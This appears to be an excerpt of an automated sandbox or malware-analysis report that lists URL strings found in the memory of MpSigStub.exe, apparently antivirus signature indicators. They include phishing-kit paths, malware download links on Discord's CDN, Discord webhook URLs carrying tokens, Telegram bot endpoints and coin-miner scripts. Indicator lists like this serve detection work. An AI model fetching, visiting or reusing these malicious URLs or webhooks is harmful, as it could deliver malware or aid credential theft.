Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: https://am.localstormwatch00.localstormw$
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://antarbryansk.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://asianbusss.ru/qazx/?activity=4789652
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://atencionpreferente.com/crm/custom/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://basilandco.co.uk/black/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://begumprinters.com/css/absa/php/absajslogo.php?r=
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2pfj2w
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://bitprimezwb.ml/non.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://bizimi.com/aa-manage/post/ftp/themes/nazl/phpnet.php?code=2000700
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://bjhvgft67rf.gb.net/vfeg877g7/?cvwrg3g=vv3g3v4f
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer.bauer
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://c.top4top.io/p_1832dqk101.jpg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://cimax.com.tw/images/tw/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://cmail.daum.net/v2/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://coffreo.biz/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://consumerelectronicsonline.net/owa/2018outlook/2018outlook/outlooks
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://cryptopro.ga/File/apo.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/zhqz1t6
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://dchenterprisesinc.com/wp-content/themes/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://des4556yuhgfrt.gb.net/fde45tfttyt/?veg54g5=br4hg4v
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
